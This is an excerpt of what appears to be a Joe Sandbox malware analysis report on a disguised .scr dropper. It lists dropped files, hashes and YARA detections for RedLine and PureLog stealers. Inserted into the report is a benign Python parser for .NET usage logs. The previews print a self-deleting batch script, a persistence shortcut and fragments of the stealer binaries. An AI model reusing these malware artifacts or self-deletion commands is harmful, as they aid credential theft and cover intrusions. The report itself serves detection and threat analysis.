                                                                                                                                                                                                                                                                                                          SHA-512:8535E7C0777C6B0876936D84BDE2BDC59963CF0954D4E50D65808E6E806E8B131DF5DB8FA0E030FAE2702143A7C3A70698A2B9A80519C9E2FFC286A71F0B797C
                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):410
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.361827289088002
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
                                                                                                                                                                                                                                                                                                          MD5:64A2247B3C640AB3571D192DF2079FCF
                                                                                                                                                                                                                                                                                                          SHA1:A17AFDABC1A16A20A733D1FDC5DA116657AAB561
                                                                                                                                                                                                                                                                                                          SHA-256:87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
                                                                                                                                                                                                                                                                                                          SHA-512:CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
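The four ASCII files previewed above (dropped by TrojanAIbot.exe, build.exe and server_BTC.exe) share one CSV layout: a record type, a quoted .NET assembly display name and, for type 3 records, the path of the NGEN native image that satisfied the bind under C:\Windows\assembly\NativeImages_v4.0.30319_32 or _64. That layout matches the CLR usage logs the .NET Framework writes per executable (%LOCALAPPDATA%\Microsoft\CLR_v4.0*\UsageLogs\, an assumption since the report does not show the file paths here). The parser below is an added example, not part of the Joe Sandbox report; the record-type meanings it assigns (1 = runtime setting, 2 = assembly bound without a native image, 3 = assembly bound via its native image) are my reading of the lines shown and are labelled as assumptions in the code. The sample inputs are the page's own Preview strings with Joe Sandbox's ".." rendering of CRLF restored to real line terminators; the 32-bit sample reconstructs to exactly the 410 bytes the report lists for those files.

```python
"""Parse CLR usage-log lines of the kind shown in the dropped-file previews.

Added example, not part of the Joe Sandbox report. Record-type meanings are an
assumption based on the lines on the page:
  1  runtime setting            1,"fusion","GAC",0
  2  assembly bound, IL only    2,"<display name>",0
  3  assembly bound via NGEN    3,"<display name>","<dir>\X.ni.dll",0
"""
import csv
import io
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed samples: Preview text of the server_BTC.exe / TrojanAIbot.exe log
# (32-bit CLR) and of the 64-bit log at the top of this section, with ".." (Joe
# Sandbox's rendering of CRLF) restored to "\r\n".
LOG_32 = (
    '1,"fusion","GAC",0\r\n'
    '1,"WinRT","NotApp",1\r\n'
    '2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0\r\n'
    '3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",'
    '"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\920e3d1d70447c3c10e69e6df0766568\\System.ni.dll",0\r\n'
    '2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0\r\n'
)
LOG_64 = (
    '1,"fusion","GAC",0\r\n'
    '1,"WinRT","NotApp",1\r\n'
    '3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",'
    '"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\b187b7f31cee3e87b56c8edca55324e0\\System.ni.dll",0\r\n'
    '3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",'
    '"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Core\\31326613607f69254f3284ec964796c8\\System.Core.ni.dll",0\r\n'
)

# The native-image directory name encodes the CLR bitness the process ran under.
NATIVE_IMAGE_DIR = re.compile(r"\\NativeImages_v[\d.]+_(32|64)\\")
# Public key tokens of .NET Framework assemblies (ECMA key and Microsoft key).
FRAMEWORK_TOKENS = {"b77a5c561934e089", "b03f5f7f11d50a3a"}


@dataclass
class UsageLog:
    settings: dict = field(default_factory=dict)    # type 1 records: name -> value
    assemblies: list = field(default_factory=list)  # (display name, native image path or None)
    bitness: Optional[str] = None                   # "32" or "64", taken from the NI directory


def parse_usage_log(text: str) -> UsageLog:
    """Parse one log; the csv module handles the commas inside quoted display names."""
    log = UsageLog()
    for row in csv.reader(io.StringIO(text, newline="")):
        if not row:
            continue
        kind = row[0]
        if kind == "1" and len(row) >= 3:
            log.settings[row[1]] = row[2]
        elif kind == "2" and len(row) >= 2:
            log.assemblies.append((row[1], None))
        elif kind == "3" and len(row) >= 3:
            log.assemblies.append((row[1], row[2]))
            m = NATIVE_IMAGE_DIR.search(row[2])
            if m:
                log.bitness = m.group(1)
    return log


def simple_names(log: UsageLog) -> list:
    """'System.Drawing, Version=4.0.0.0, ...' -> 'System.Drawing'."""
    return [name.split(",", 1)[0] for name, _ in log.assemblies]


def public_key_token(display_name: str) -> Optional[str]:
    m = re.search(r"PublicKeyToken=([0-9A-Fa-f]{16}|null)", display_name)
    return m.group(1).lower() if m else None


def runtime_summary(log: UsageLog) -> dict:
    """What a triage analyst reads off one log: bitness, GUI capability, and any
    assembly that is not signed with a .NET Framework key (a dropped or injected
    managed payload would show up there)."""
    names = simple_names(log)
    return {
        "bitness": log.bitness,
        "assemblies": names,
        "gui_capable": "System.Windows.Forms" in names,
        "non_framework": [n for n, _ in log.assemblies
                          if public_key_token(n) not in FRAMEWORK_TOKENS],
    }
```

Run against the report's own previews, the 32-bit log binds System.Windows.Forms and System.Drawing (a WinForms-capable process) while the 64-bit log binds only System and System.Core; TrojanAIbot.exe and server_BTC.exe produce byte-identical logs, which is consistent with their matching MD5 and SHA-256 above. The same parser can be pointed at the real .log files collected from a host to see which executables ran under the .NET runtime after the fact.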
                                                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):2232
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.379633281639906
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:48:BWSU4xympjgZ9tz4RIoUl8NPZHUl7u1iMuge//8M0Uyus:BLHxvCZfIfSKRHmOugw1s
                                                                                                                                                                                                                                                                                                          MD5:12C066E6FF46F2CB75966215B8D9A4D0
                                                                                                                                                                                                                                                                                                          SHA1:4F72EABC5DF6AEFD70B3BF4148FE908267DA4586
                                                                                                                                                                                                                                                                                                          SHA-256:14BF2E10EBA187A8C3B808326C926817C6AF60CA241610B26498690629629DC0
                                                                                                                                                                                                                                                                                                          SHA-512:9F64929893B04178A6D3F2BA74B7A55B91165BAD24375A80D12FCB39F6AC92304C8CA2DD37CFEDB27D92021C9E2177D2B21D8BBD30C9337F85049BB00E145467
                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                                                          Size (bytes):587776
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.947618401040904
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:vWLLk3UrmqZ4xcVhDoba7m3GTmPe5rmLZNf/lszBaVyYQHm6Fn:v+nrt6xcd7egm2lm7KW4
                                                                                                                                                                                                                                                                                                          MD5:8C8785AC6585CF5C794B74330B3DB88F
                                                                                                                                                                                                                                                                                                          SHA1:ED055892B3C942F8C3C4B4F36D6CA8ED58A037A1
                                                                                                                                                                                                                                                                                                          SHA-256:16212629068CD8F1506D1C90CE6218DABDAC1B5F62B8414DF72F778B0813A8AE
                                                                                                                                                                                                                                                                                                          SHA-512:223836EBC9968CE6CBACBA1CC772399A55F93F8171A9C7E7A75D7DAEEA540D3273AEC5D1DEA664274D1653AFD1F792FF6C22AB41881411C75B7FA46888763DD4
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.f................................. ... ....@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......dx...:..........h...TX...........................................0..........+.(..bd(.....s....... ....( ...(.... ....( ...o.....ds......o....(.... H...( ...o....o.....s..........io.....o..........9.....o......o...........9.....o......9.....o......*.(....a..w..........}...................v+.(T..T(.....(....(....o....*...0..?.......+.(..?8s...... l...( ...(....o......o......o......o.....(....&*..0..M.......+.(.nW...................... ....( ....... ....( ....... ....(
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):307712
Entropy (8bit):5.081289674980977
Encrypted:false
SSDEEP:3072:acZqf7D34Tp/0+mA0kywMlQEg85fB1fA0PuTVAtkxzZ3RMeqiOL2bBOA:acZqf7DItnGCQNB1fA0GTV8kv0L
MD5:3B6501FEEF6196F24163313A9F27DBFD
SHA1:20D60478D3C161C3CACB870AAC06BE1B43719228
SHA-256:0576191C50A1B6AFBCAA5CB0512DF5B6A8B9BEF9739E5308F8E2E965BF9B0FC5
SHA-512:338E2C450A0B1C5DFEA3CD3662051CE231A53388BC2A6097347F14D3A59257CE3734D934DB1992676882B5F4F6A102C7E15B142434575B8970658B4833D23676
Malicious:true
Yara Hits:
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\build.exe, Author: Joe Security
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....H(...............0.................. ... ....@.. ....................... ............@.................................<...O.... ............................................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B................p.......H....... ...............(w..............................................a.u.t.o.f.i.l.l.5.t.Y.W.R.q.a.W.V.o.a.m.h.h.a.m.J.8.W.W.9.y.b.2.l.X.Y.W.x.s.Z.X.Q.K.a.W.J.u.Z.W.p.k.Z.m.p.t.b.W.t.w.Y.2.5.s.c.G.V.i.a.2.x.t.b.m.t.v.Z.W.9.p.a.G.9.m.Z.W.N.8.V.H.J.v.b.m.x.p.b.m.s.K.a.m.J.k.Y.W.9.j.b.m.V.p.a.W.l.u.b.W.p.i.a.m.x.n.Y.W.x.o.Y.2.V.s.Z.2.J.l.a.m.1.u.a.W.R.8.T.m.l.m.d.H.l.X.Y.W.x.s.Z.X.Q.K.b.m.t.i.a.W.h.m.Y.m.V.v.Z.2.F.l.Y.W.9.l.a.G.x.l.Z.m.5.r.b.2.R.i.Z.W.Z.n.c.G.d.r.b.m.5.8.T.W.
Process:C:\Windows\SysWOW64\svchost.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1425408
Entropy (8bit):5.68069838387253
Encrypted:false
SSDEEP:24576:Pk70Trcosu4CTPpR9+aWsqjnhMgeiCl7G0nehbGZpbD:PkQTAW5v+hDmg27RnWGj
MD5:1B1EC94BDE0A57A4A82BD2F20B2CB7F3
SHA1:EADF44C3FE2B366CFFE5A5E5232D3DB261ABDC6F
SHA-256:2F2A9608F9B6C29C0E7AA3A4E4BD4CCBBE1194CCD430A643E1EA4A684AFE6A9F
SHA-512:425451934FD68DAFBA0B72083A31E2AA9FF4CE850C89149E19318A32D1BE9E2E07448E06497DCACCC722F34239FBD17B4B1F5CD0117D97DF9B05A9CF50F19703
Malicious:true
Yara Hits:
• Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\microsofts.exe, Author: ditekSHen
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h..-,q.~,q.~,q.~2#.~?q.~...~+q.~,q.~\q.~2#n~.q.~2#i~.q.~2#{~-q.~Rich,q.~................0y.f....PE..L...t..P..........#................./.............@.............................................................................P....`..pg..............................................................@............................................text............................... ..`.rdata...m.......n..................@..@.data....0... ......................@....rsrc........`....... ..............@...................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):231936
Entropy (8bit):5.039764014369673
Encrypted:false
SSDEEP:3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
MD5:50D015016F20DA0905FD5B37D7834823
SHA1:6C39C84ACF3616A12AE179715A3369C4E3543541
SHA-256:36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
SHA-512:55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
File Type:DOS batch file, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):164
Entropy (8bit):4.963476601274531
Encrypted:false
SSDEEP:3:mKDDCMNvFbuov3DUkh4E2J5xAIJWAdEFKDwU1hGDUkh4E2J5xAInTRILpmbBQty:hWKdbuoL923fJWAawDNe923fTT5
MD5:392E4C7B490E7321AB4A2334132AAA6B
SHA1:E9983EB3F25A2230F4C5DE7EA349BDA5FA55C4E3
SHA-256:92D97EE345BD92E004E821E34CCC74354C796450EE935140F6B020A6DF6DF9D7
SHA-512:CBDCA18F641F97C0607FDEAE2538A25A6135FB0F7CBD3E59356F4851099D2851BC36FB52D639545735E971FCC2C6057575406AEE281FCDEE19E912F19B71C66F
Malicious:false
Reputation:unknown
Preview:@echo off..timeout 6 > NUL..CD C:\Users\user\AppData\Local\Temp..DEL "server_BTC.exe" /f /q..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpD5D5.tmp.cmd" /f /q..
Process:C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe
File Type:data
Category:dropped
Size (bytes):2598912
Entropy (8bit):7.909611262460053
Encrypted:false
SSDEEP:49152:5cle8cWm6n2EkjAFNb0fa6Svh5R7rjlr8Q:5cZxDFNS0vh5Rxh
MD5:175B904E445C4C7E7D9976403A4C24E9
SHA1:C1C85B944EB9B6430B1A6BF4E235D72E0D1ABD0A
SHA-256:60BA1B14D2F261D5AA253E838C6E90055E0DCE67FF0AFD2E0EAD77E1143D286D
SHA-512:B1A0C1351A20828632977749586E6E8C4839A955A70F587F28B40871732BAB8C9B7B3C018DAE57E34D12F21DCC5935881C466A2FE8A0D693F294768751FF4581
Malicious:false
Reputation:unknown
Process:C:\Windows\SysWOW64\svchost.exe
File Type:data
Category:dropped
Size (bytes):12320
Entropy (8bit):7.9843919295338965
Encrypted:false
SSDEEP:384:jf7yAr6GgW/eb69+9PhzFvxrNMzk3kEQhtY:pr/r/ebD7zXBvitY
MD5:AF88A3B3506499BE74D222F841907504
SHA1:BFE71CB91286AD67A8B2FF974D089BC867AC1AB4
SHA-256:4F2429C379D132B199D2436AD670348C97587CC473A900FDEF58538A0A0807E8
SHA-512:71697FA870B486396A6602A0F8D04AA698D721C72DD3EF68F9405AEADC85B887095C45D8E19F84A9D9CF9B0440BBB29F0335A1A0F48291127A479CF86BF78AB3
Malicious:false
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):231936
Entropy (8bit):5.039764014369673
Encrypted:false
SSDEEP:3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
MD5:50D015016F20DA0905FD5B37D7834823
SHA1:6C39C84ACF3616A12AE179715A3369C4E3543541
SHA-256:36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
SHA-512:55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
Malicious:true
Reputation:unknown
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Thu Oct 10 07:07:24 2024, mtime=Thu Oct 10 07:07:24 2024, atime=Thu Oct 10 07:07:21 2024, length=231936, window=
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1794
                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.497259984439327
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24:8z4Hf4482Z4/IBd6W9au5UAgUs4FSnplwO4ZTqlEtm:8z4HQ9n/IBd6Eau9gR4+plwZTqlI
                                                                                                                                                                                                                                                                                                          MD5:136CD5F4CCBA6AE19384CA9F2B9ED20B
                                                                                                                                                                                                                                                                                                          SHA1:E65863DC97D77F369056B3D688DB9EE19FB59CF3
                                                                                                                                                                                                                                                                                                          SHA-256:6B51CFA9E06069779E475FF15157320DD645BA3C7E6135A8D8B3BE403BFBC5B9
                                                                                                                                                                                                                                                                                                          SHA-512:2296073F441DCC444508AF39274F18174A4CEA9FC2E1409EB005AEC1712DE741F9AAC0A125EFBD5B2647BD53A70A1B97DD8C36A5E76511C535A485FD66332D3F
                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:L..................F.@.. ...J.lp....J.lp....N..n..............................:..DG..Yr?.D..U..k0.&...&...... M.....4..e....`.sp........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlJY.@....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....JY.@..Roaming.@......DWSlJY.@....C.....................G.+.R.o.a.m.i.n.g.....T.1.....JY.@..ACCApi..>......JY.@JY.@....?.....................g...A.C.C.A.p.i.....l.2.....JY.@ .TROJAN~1.EXE..P......JY.@JY.@...........................?..T.r.o.j.a.n.A.I.b.o.t...e.x.e.......e...............-.......d...................C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe....A.c.c.S.y.s.%.....\.....\.....\.....\.....\.A.C.C.A.p.i.\.T.r.o.j.a.n.A.I.b.o.t...e.x.e.1.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.s.e.r.v.e.r._.B.T.C...e.x.e.........%USERPROFILE%\AppData\Local\Temp\server_BTC.exe............................................................................................................
Process:C:\Windows\System32\msdtc.exe
File Type:ASCII text, with CRLF line terminators
Category:modified
Size (bytes):2313
Entropy (8bit):5.130722741333044
Encrypted:false
SSDEEP:48:32qhuhCehuhqfhuhofhuhE2qhuh6987FMx7F/rt57wt+07FKC7867qrT7FoC786h:Z070s0Y0q0mF7Dm5y
MD5:233E4CFA7155FBF05E0659877FF22CD9
SHA1:848C147C0421196571C360544425CDB7271DBE9E
SHA-256:AC7B7E24B48335EF4215D13A0335917A0451D5FE5A0FEF702689B4DE592B160B
SHA-512:AC247EC0B9F24E12F05E99E7B5AA815A5312F6CAC671FC59DE4D9AC60BDA7009C8FEB442BBEE8D9BBAB8B95182190E4FD5280A8ECEB9C6B80EA47DCC7BA37B80
Malicious:false
Reputation:unknown
Preview:12-07-2019 09:17 : DTC Install error = 0, Enter MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (367)..12-07-2019 09:17 : DTC Install error = 0, Action: None, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (396)..12-07-2019 09:17 : DTC Install error = 0, Entering CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1700)..12-07-2019 09:17 : DTC Install error = 0, Exiting CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1876)..12-07-2019 09:17 : DTC Install error = 0, Exit MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (454)..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcSpecialize : Enter, com\complus\dtc\dtc\adme\deployment.cpp (2099) ..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcGeneralize : Enter, com\complus\dtc\dtc\adme\deploy
Process:C:\Windows\System32\wbengine.exe
File Type:dBase III DBT, version number 0, next free block index 10240, 1st item "hcC\216"
Category:dropped
Size (bytes):30720
Entropy (8bit):1.1238659522399166
Encrypted:false
SSDEEP:48:lzN/KIiTi1mYPPP6d/nUjhPcPWP7PMwQLsMlPm/EIaxsii:r/KIH6FnCVE8
MD5:2CA907CC00702B576B47492C0E97287C
SHA1:6B3E53A64264E05989FE368383B76E1B777B4443
SHA-256:C8D9B13308056EB040938DED1C38E11505A6262FD50131999A44FD9BD1AE0096
SHA-512:E0DF0F02ACE15AA30E3D01D6273D7C74C5642730BAA5B7A83CC8870813FFCFEE644790E52B2A82830BCB321F4AB59AA67280FAD7DE337AD1BF4A16E4A683B84E
Malicious:false
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1150976
Entropy (8bit):5.0389062401643905
Encrypted:false
SSDEEP:12288:wfXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:wfsqjnhMgeiCl7G0nehbGZpbD
MD5:AFAD48DC29F1CF4A38DCFFCDB37F8BA9
SHA1:C46F4029DB332F2FC91B836C2DC2EEFBDF500984
SHA-256:65FCF69964D2046F10F4E2F73B613A31F7B73DC5A14140BDC6B712A4221CB25C
SHA-512:36958FD64A30F0F35430AE1EF0443062195A0444570F5812A5CE78EA7898E35ADCB7D2D9B5BF886C970A31BEBCD4CABAF18A8877327B6CA75DE3FE3A125A0095
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1801216
Entropy (8bit):6.974307273085415
Encrypted:false
SSDEEP:49152:0wVFr68Vw9wn/6h8N1zidKDmg27RnWGj:0wVFrssC/dKD527BWG
MD5:FB45B515238278E8D72072D18DD7382C
SHA1:5BDB41671A9CE2F3721C198C0E19432F29E21213
SHA-256:F1C2E6C7A37B1D5FE15C8E1A61970D2085C996D27052751506018F1262A65229
SHA-512:DE2D58C0B27F9F5EF0EB5708C00384572A062F9E585651682C30E4840165AB8D7BBAD5F5B71018A3410310FBC0C9EDF76C49105C378261AB0476B840533EF636
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1348608
Entropy (8bit):7.253748339903475
Encrypted:false
SSDEEP:24576:EQW4qoNUgslKNX0Ip0MgHCpoMBOuHsqjnhMgeiCl7G0nehbGZpbD:EQW9BKNX0IPgiKMBOubDmg27RnWGj
MD5:5308671F56D4A4A4CDF6FF841AEF1780
SHA1:8F6D00BFA28B257898BE9C5051ACE28942FE1C4C
SHA-256:6157B2215F1E459623A76DD6FF586411BD34D3E3DAAC64FBFE88A8EE09BC4365
SHA-512:DDA90AD49B0BEF58A6E31D5670B45A0CE3EB950FE350C9EF3E3C8610400E9DF4BAC84FD70319F51191F7290DAF8D2CE6EBD6BF20D49074C3FD395CE01C4E7DB4
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1224192
Entropy (8bit):5.163541831978704
Encrypted:false
SSDEEP:24576:A2G7AbHjkwsqjnhMgeiCl7G0nehbGZpbD:A2G7AbHj5Dmg27RnWGj
MD5:88D15FF7E7C96A178FAC1EC2E9DFAB23
SHA1:4FB2517FB1A9CADCA83630C9C3C5A0B26529D86E
SHA-256:4ADF8728ABCC850669E632EBA241F1235ABD76EFEC51596DB983A1C854DF412D
SHA-512:C12E6C2CF8C14F27FEDD2E230C1F51B291AAE8694217001BFB5251C32A434EF3601CC8C2C9803EF7F0BEBE2A98177596AD6E48DE2294A80385022A9E79F16D55
Malicious:true
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1242624
Entropy (8bit):7.28891680544639
Encrypted:false
SSDEEP:24576:WkdpSI+K3S/GWei+qNv2uG3osqjnhMgeiCl7G0nehbGZpbD:W6SIGGWei2uG3UDmg27RnWGj
MD5:283D4068FC62E71EA43B248224FAE579
SHA1:3235D05FEB504FB7155C4CBD4D31813A831919B6
SHA-256:131A43DE0A9A9553B4ECC09CB50DE50EC308F5929A1D8E297EF6D752742498D6
